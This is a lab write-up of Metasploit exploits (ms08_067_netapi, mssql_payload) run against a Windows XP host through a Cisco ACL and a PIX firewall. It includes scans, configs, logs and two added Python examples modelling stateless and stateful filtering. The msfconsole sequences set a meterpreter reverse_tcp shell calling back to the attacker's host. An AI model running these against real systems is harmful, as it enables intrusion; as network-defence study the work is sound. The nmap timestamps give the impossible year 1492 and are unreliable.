Metasploit remotely from the outside: lab results so far!

Kit used for this lab: GNS3 + Windows XP + Backtrack 5R3

Design
Windows XP 192.168.148.2 ---- fa0/1 192.168.148.3 [ Cisco Router ] fa0/0 192.168.56.3 ---- 192.168.56.2 Backtrack 5R3

The idea: restrict access on the outside interface of the router (192.168.56.3) using an access control list (ACL). This simulates the real world, i.e. very limited access in!

Quick nmap scan from Backtrack (192.168.56.2) through the Cisco router to Windows XP (192.168.148.2). No ACL was configured on the router during this scan.

root@bt:~# nmap -sS --open 192.168.148.2

Starting Nmap 6.01 ( http://nmap.org ) at 1492-08-30 17:07 BST

Nmap scan report for 192.168.148.2

Host is up (0.022s latency).

Not shown: 990 closed ports

PORT STATE SERVICE

23/tcp open telnet

25/tcp open smtp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

1433/tcp open ms-sql-s

3306/tcp open mysql

Nmap done: 1 IP address (1 host up) scanned in 35.46 seconds

————————————————————————-

Same nmap scan from Backtrack (192.168.56.2) through the Cisco router to Windows XP (192.168.148.2), this time with the outside-in ACL configured on the router, allowing only TCP 445 in.

root@bt:~# nmap -sS --open -p 445 192.168.148.2

Starting Nmap 6.01 ( http://nmap.org ) at 1492-08-30 17:14 BST

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

Nmap done: 1 IP address (0 hosts up) scanned in 1.27 seconds

————————————————————————-

Ha, Nmap is no good here: the ACL drops the ICMP echo and the TCP probes to 80/443 that Nmap's host discovery relies on, so the host is reported as down even though 445 is reachable. Either skip discovery with -Pn, as Nmap itself suggests, or use hping to test 445 directly.

————————————————————————-

root@bt:~# hping3 -c 1 -V -I eth0 -p 445 -S 192.168.148.2

using eth0, addr: 192.168.56.2, MTU: 1500

HPING 192.168.148.2 (eth0 192.168.148.2): S set, 40 headers + 0 data bytes

len=46 ip=192.168.148.2 ttl=127 DF id=2454 tos=0 iplen=44

sport=445 flags=SA seq=0 win=64240 rtt=33.2 ms

seq=2161578984 ack=1115499289 sum=d944 urp=0

— 192.168.148.2 hping statistic —

1 packets tramitted, 1 packets received, 0% packet loss

round-trip min/avg/max = 33.2/33.2/33.2 ms

————————————————————————-

###### SYN/ACK reply, so TCP 445 is open and the ACL lets it through #####

————————————————————————-

Router config now showing the ACL on the outside interface, allowing only TCP 445 in (everything else hits the implicit deny at the end of the list).

interface FastEthernet0/0

ip address 192.168.56.3 255.255.255.0

ip access-group out-in in

!

ip access-list extended out-in

permit tcp any any eq 445

!

————————————————————————-

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set rhost 192.168.148.2

rhost => 192.168.148.2

msf exploit(ms08_067_netapi) > set lhost 192.168.56.2

lhost => 192.168.56.2

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.2:4444

[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.148.2:445).

msf exploit(ms08_067_netapi) >

————————————————————————-

Fails. A quick re-tweak of the ACL to permit ip any any log for a second, to see what traffic is actually required, shows the below.

*Mar  1 01:49:56.299: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(4444) -> 192.168.148.2(1029), 1 packet

*Mar 1 01:49:56.299: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(1964) -> 192.168.148.2(445), 1 packet

So traffic back in from the handler's port 4444 to TCP 1029 on the target is also required for ms08_067_netapi to work!!!!! Note that 1029 is not a fixed service port: it is the ephemeral source port the XP host picked when the meterpreter reverse_tcp payload connected out to 192.168.56.2:4444, and the line logged here is the reply half of that connection. A stateless ACL that only permits 445 drops those replies, so the callback never completes. The fix is to permit the return traffic (for example permit tcp any eq 4444 any established, which only matches segments with ACK or RST set) rather than hard-coding whatever ephemeral port turned up this time.

————————————————————————-

This time setting up an ACL on the inside interface to log what ports back out are required:

!

interface FastEthernet0/1

ip address 192.168.148.3 255.255.255.0

ip access-group inside-out in

!

ip access-list extended inside-out

permit ip any any log

————————————————————————-

From the logging you can see that what comes in from the outside is TCP 445 (the exploit's SMB connections) plus traffic from the handler's port 4444 to TCP 1029 on the target, the reply half of the callback the XP host opened itself; 1029 is an ephemeral port, so it cannot be pinned in an ACL. Access back out shows udp 192.168.148.2(0) -> 80.86.34.68(0)? Confused by the (0), will look into this again!

*Mar 1 02:06:12.979: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(4444) -> 192.168.148.2(1029), 797 packets

*Mar 1 02:06:12.979: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(1837) -> 192.168.148.2(445), 1 packet

*Mar 1 02:06:12.983: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(1838) -> 192.168.148.2(445), 2 packets

*Mar 1 02:06:12.983: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(45983) -> 192.168.148.2(445), 42 packets

*Mar 1 02:06:43.803: %SEC-6-IPACCESSLOGP: list inside-out permitted udp 192.168.148.2(0) -> 192.168.148.255(0), 1 packet

*Mar 1 02:07:12.931: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(2826) -> 192.168.148.2(445), 1 packet

*Mar 1 02:07:13.943: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(2827) -> 192.168.148.2(445), 1 packet

*Mar 1 02:07:18.255: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(38147) -> 192.168.148.2(445), 1 packet

*Mar 1 02:07:39.511: %SEC-6-IPACCESSLOGP: list inside-out permitted udp 192.168.148.2(0) -> 80.86.34.68(0), 1 packet
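The "permit ip any any log" trick above produces a pile of IPACCESSLOGP lines that have to be read by hand to work out which entries the real ACL needs. As an added example (my code, not from the original post or from Cisco), here is a small parser that does that reading: it pulls the ACL name, protocol, addresses, ports and packet counts out of the router's log lines, labels each inbound packet as either a new connection to a service on the target or the reply half of a connection the target opened, and turns the result into the minimal extended ACL entries. The sample log is the post's own lines re-typed as constructed input; the service list is taken from the first nmap scan, and 4444 being "our" handler port is an assumption matching the msf settings.

```python
import re

# Constructed sample input: the router's IPACCESSLOGP lines from the post, re-typed here.
SAMPLE_LOG = """\
*Mar  1 01:49:56.299: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(4444) -> 192.168.148.2(1029), 1 packet
*Mar  1 01:49:56.299: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(1964) -> 192.168.148.2(445), 1 packet
*Mar  1 02:06:12.979: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(4444) -> 192.168.148.2(1029), 797 packets
*Mar  1 02:06:12.983: %SEC-6-IPACCESSLOGP: list out-in permitted tcp 192.168.56.2(45983) -> 192.168.148.2(445), 42 packets
*Mar  1 02:06:43.803: %SEC-6-IPACCESSLOGP: list inside-out permitted udp 192.168.148.2(0) -> 192.168.148.255(0), 1 packet
*Mar  1 02:07:39.511: %SEC-6-IPACCESSLOGP: list inside-out permitted udp 192.168.148.2(0) -> 80.86.34.68(0), 1 packet
"""

LOG_RE = re.compile(
    r"%SEC-6-IPACCESSLOGP: list (?P<acl>\S+) (?P<action>permitted|denied) "
    r"(?P<proto>tcp|udp) (?P<src>[\d.]+)\((?P<sport>\d+)\) -> "
    r"(?P<dst>[\d.]+)\((?P<dport>\d+)\), (?P<count>\d+) packets?"
)

# Ports the target was seen listening on in the first nmap scan; anything below
# 1024 is treated as a service too.
TARGET_SERVICES = {23, 25, 80, 135, 139, 443, 445, 1025, 1433, 3306}
# Ports on the attacking host that wait for callbacks (assumed: the msf reverse handler).
HANDLER_PORTS = {4444}


def parse_acl_log(text):
    """Turn IPACCESSLOGP lines into dicts; lines that do not match are skipped."""
    flows = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            f = m.groupdict()
            for key in ("sport", "dport", "count"):
                f[key] = int(f[key])
            flows.append(f)
    return flows


def classify(flow):
    """Label one logged packet using only its port numbers."""
    if flow["sport"] == 0 and flow["dport"] == 0:
        # Both ports 0: the matching ACE was 'permit ip any any log', which
        # logs the packet without looking at layer-4 ports.
        return "no-port-info"
    if flow["dport"] < 1024 or flow["dport"] in TARGET_SERVICES:
        return "inbound-service"
    if flow["sport"] in HANDLER_PORTS:
        # Reply from our listener to an ephemeral port: the target opened
        # this connection itself (the reverse_tcp callback).
        return "return-of-outbound"
    return "unclassified"


def required_acl(flows, acl_name, target):
    """Minimal extended ACL entries to replace 'permit ip any any log' on acl_name."""
    services, returns = [], []
    for f in flows:
        if f["acl"] != acl_name or f["proto"] != "tcp":
            continue
        kind = classify(f)
        if kind == "inbound-service":
            entry = f"permit tcp any host {target} eq {f['dport']}"
            if entry not in services:
                services.append(entry)
        elif kind == "return-of-outbound":
            # 'established' matches only segments with ACK or RST set, so a
            # fresh SYN from the handler port is still dropped.
            entry = f"permit tcp any eq {f['sport']} host {target} established"
            if entry not in returns:
                returns.append(entry)
    return services + returns


if __name__ == "__main__":
    flows = parse_acl_log(SAMPLE_LOG)
    for f in flows:
        print(f["acl"], f["src"], f["sport"], "->", f["dst"], f["dport"], classify(f))
    print("ip access-list extended out-in")
    for entry in required_acl(flows, "out-in", "192.168.148.2"):
        print(" ", entry)
```

Run against the sample it emits one entry for 445 and one "established" entry for the handler's replies; the udp lines on inside-out are left alone, as they belong to a different list and carry no port information. The port-based labelling is a heuristic: it is enough for this lab, but on a real network you would confirm the direction of a connection from a stateful device's log rather than from port numbers alone.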

————————————————————————-

Update. Changed the router for a PIX as it has better logging.

FW1# %PIX-2-106001: Inbound TCP connection denied from 192.168.56.2/33089 to 192.168.148.2/445 flags SYN  on interface outside
%PIX-2-106001: Inbound TCP connection denied from 192.168.56.2/33089 to 192.168.148.2/445 flags SYN  on interface outside
%PIX-2-106001: Inbound TCP connection denied from 192.168.56.2/33089 to 192.168.148.2/445 flags SYN  on interface outside
%PIX-2-106001: Inbound TCP connection denied from 192.168.56.2/33089 to 192.168.148.2/445 flags SYN  on interface outside

Seeing 445 being blocked on the outside interface, so added the ACL below to the firewall.

access-list outside-inside extended permit tcp any any eq 445
access-group outside-inside in interface outside

Now in the logs below you can see that the only thing the outside-in ACL admits is a new connection to port 445. The meterpreter callback is a separate connection that the XP host opens from its ephemeral port 1040 out to the handler on 4444; the PIX logs it as "Built outbound TCP connection" and permits it because new connections from the higher-security inside interface to the lower-security outside interface are allowed by default. Because the firewall is stateful it then lets the handler's replies (4444 talking back to port 1040) through from its connection table without any ACL entry for them, which is exactly what the stateless ACL on the router could not do. (Stateful inspection has been standard since the mid 1990s; Check Point's FireWall-1 was the first commercial product to offer it.)

FW1# %PIX-6-302013: Built inbound TCP connection 2 for outside:192.168.56.2/60044 (192.168.56.2/60044) to inside:192.168.148.2/445 (192.168.148.2/445)
%PIX-6-110001: No route to 192.168.0.100 from 192.168.148.2
%PIX-6-302013: Built outbound TCP connection 3 for outside:192.168.56.2/4444 (192.168.56.2/4444) to inside:192.168.148.2/1040 (192.168.148.2/1040)
%PIX-6-302014: Tear-down TCP connection 2 for outside:192.168.56.2/60044 to inside:192.168.148.2/445 duration 0:00:01 bytes 12942 TCP FINs
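To make the difference between the two filters concrete, here is an added example (my code, not from the original post or from Cisco): a small model of a stateless ACL applied inbound on the outside interface and of a PIX-style stateful filter, both replayed over the four packets that matter in this lab, using the ports from the PIX log above. Assumptions, as in the lab: the router has no ACL on its inside interface, the PIX allows new outbound connections by default, and a packet is identified only by its addresses, ports and whether it is the opening SYN. The last case, an egress policy that blocks new outbound connections, is not something the post configured; it is included to show what actually stops the callback.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    direction: str   # "in": arrives on the outside interface; "out": arrives on the inside one
    src: str
    sport: int
    dst: str
    dport: int
    syn_only: bool   # True for the opening SYN of a connection (no ACK bit yet)


# Constructed replay of the exchange in the PIX log: exploit delivery to SMB,
# then the meterpreter reverse_tcp callback from the XP host to the handler.
EXCHANGE = [
    Packet("in",  "192.168.56.2",  60044, "192.168.148.2", 445,   True),   # SYN to SMB
    Packet("out", "192.168.148.2", 445,   "192.168.56.2",  60044, False),  # SYN/ACK back
    Packet("out", "192.168.148.2", 1040,  "192.168.56.2",  4444,  True),   # callback SYN
    Packet("in",  "192.168.56.2",  4444,  "192.168.148.2", 1040,  False),  # handler's SYN/ACK
]


def stateless_acl(rules):
    """IOS-style ACL applied inbound on the outside interface only (as in the lab).
    Each rule is a dict with optional 'dport', 'sport' and 'established' keys."""
    def decide(pkt):
        if pkt.direction == "out":
            return "permit"                      # no ACL on the inside interface
        for r in rules:
            if r.get("dport") not in (None, pkt.dport):
                continue
            if r.get("sport") not in (None, pkt.sport):
                continue
            if r.get("established") and pkt.syn_only:
                continue                         # 'established' needs ACK or RST set
            return "permit"
        return "deny"                            # implicit deny at the end of the list
    return decide


class StatefulFirewall:
    """PIX-style filter: a new inbound connection must match an ACL entry, a new
    outbound connection is allowed by default (higher to lower security level),
    and every packet of a built connection is allowed in either direction."""

    def __init__(self, inbound_ports, allow_new_outbound=True):
        self.inbound_ports = set(inbound_ports)
        self.allow_new_outbound = allow_new_outbound
        self.conns = set()                       # the connection table

    def decide(self, pkt):
        key = frozenset({(pkt.src, pkt.sport), (pkt.dst, pkt.dport)})
        if key in self.conns:
            return "permit"                      # existing connection, any direction
        if not pkt.syn_only:
            return "deny"                        # no state and not a connection start
        if pkt.direction == "out":
            if self.allow_new_outbound:
                self.conns.add(key)              # "Built outbound TCP connection"
                return "permit"
            return "deny"
        if pkt.dport in self.inbound_ports:
            self.conns.add(key)                  # "Built inbound TCP connection"
            return "permit"
        return "deny"


def replay(decide, packets):
    """Run every packet through one filter, in order, and collect the verdicts."""
    return [decide(p) for p in packets]


if __name__ == "__main__":
    print("router, permit 445 only:   ", replay(stateless_acl([{"dport": 445}]), EXCHANGE))
    print("router, plus established:  ", replay(stateless_acl(
        [{"dport": 445}, {"sport": 4444, "established": True}]), EXCHANGE))
    print("pix, permit 445 inbound:   ", replay(StatefulFirewall([445]).decide, EXCHANGE))
    print("pix, plus egress filtering:", replay(
        StatefulFirewall([445], allow_new_outbound=False).decide, EXCHANGE))
```

The first run reproduces the router failure: the exploit's SYN to 445 and the XP host's outbound SYN to 4444 both pass, but the handler's SYN/ACK to port 1040 is dropped by the implicit deny, so the session never comes up. Adding an "established" entry for the handler port fixes that on the router; the PIX needs nothing extra because the outbound SYN built a connection-table entry. The last run shows that allowing only 445 inbound does not stop the reverse shell at all; what stops it is denying new outbound connections from the protected host.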

Got bored, so thought I would try mssql_payload.

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show payloads
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST [MY IP ADDRESS]
msf exploit(mssql_payload) > set RHOST [TARGET IP]
msf exploit(mssql_payload) > exploit

Logs from this:

FW1# %PIX-4-106023: Deny tcp src outside:192.168.56.2/50466 dst inside:192.168.148.2/1433 by access-group “outside-inside” [0x0, 0x0]
%PIX-4-106023: Deny tcp src outside:192.168.56.2/50466 dst inside:192.168.148.2/1433 by access-group “outside-inside” [0x0, 0x0]
%PIX-6-110001: No route to 192.168.0.100 from 192.168.148.2
%PIX-4-106023: Deny tcp src outside:192.168.56.2/50466 dst inside:192.168.148.2/1433 by access-group “outside-inside” [0x0, 0x0]
%PIX-4-106023: Deny tcp src outside:192.168.56.2/50466 dst inside:192.168.148.2/1433 by access-group “outside-inside” [0x0, 0x0]

Add MSSQL (TCP 1433) to the ACL:
access-list outside-inside extended permit tcp any any eq 1433

 
